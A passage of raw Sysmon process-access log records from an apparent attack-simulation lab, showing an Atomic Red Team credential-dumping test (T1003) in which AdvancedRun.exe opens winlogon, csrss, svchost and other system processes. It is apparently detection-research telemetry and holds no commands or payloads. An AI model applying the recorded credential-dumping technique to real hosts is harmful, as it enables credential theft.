Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943976Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943975Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943974Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program 
Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943973Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003943972Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943971Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943970Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003943966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2703-000000002702}59524352C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:54.152{834264DD-EB3A-61EA-2603-000000002702}21805436C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003943959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
